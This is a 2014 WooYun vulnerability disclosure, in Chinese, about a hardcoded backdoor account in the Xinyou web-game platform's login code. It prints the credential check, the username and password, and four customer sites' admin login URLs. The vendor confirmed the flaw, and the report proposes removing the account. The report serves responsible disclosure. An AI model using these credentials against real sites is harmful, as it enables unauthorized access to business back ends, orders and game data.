漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-048661
漏洞标题:信游科技页游平台程序通用型代码级后门账户(成功登录多个商业后台并可操纵订单和游戏)
相关厂商:52xinyou.cn
漏洞作者: wefgod
提交时间:2014-01-12 17:52
修复时间:2014-04-12 17:53
公开时间:2014-04-12 17:53
漏洞类型:非授权访问/权限绕过
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-01-12: 细节已通知厂商并且等待厂商处理中
2014-01-14: 厂商已经确认,细节仅向厂商公开
2014-01-17: 细节向第三方安全合作伙伴开放
2014-03-10: 细节向核心白帽子及相关领域专家公开
2014-03-20: 细节向普通白帽子公开
2014-03-30: 细节向实习白帽子公开
2014-04-12: 细节向公众公开
简要描述:
代码级的后门账户。做网页游戏收入还可以啊……
详细说明:
可能为测试用代码,未去掉,大部分商业用户的站点现在还可利用。而且如果是直接使用免费版的肯定是还没有改的。
漏洞证明:
先看Api/sys/login.ashx这个文件:
再跟进到UserEng.Login
if (uid == "apwmaster_D7" && upwd == "apwmaster_d7") 这句很明显了,根据后面的代码可以看出已经分配cookie了,所以肯定是后门账户
apwmaster_D7/ apwmaster_d7
测试一些官方给的案例(案例列表 http://52xinyou.cn/anli.htm )
http://www.12wan.com/account/default.aspx
http://www.ailiuwa.com/account/default.aspx
http://www.teiyi.com/account/default.aspx
http://www.515you.com/account/default.aspx
再放几个图,搞网页游戏收入还可以啊!所以安全工作还是要做到位啊
修复方案:
删除后门账户
版权声明:转载请注明来源 wefgod@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:18
确认时间:2014-01-14 11:53
厂商回复:
已经认领 这个系统是老版本系统 公开前会被淘汰 但是非常感激提出漏洞的白帽子们 已经联系乌云官方 准备做次活动 具体请留意官方公告 再次感谢 礼物已送
最新状态:
暂无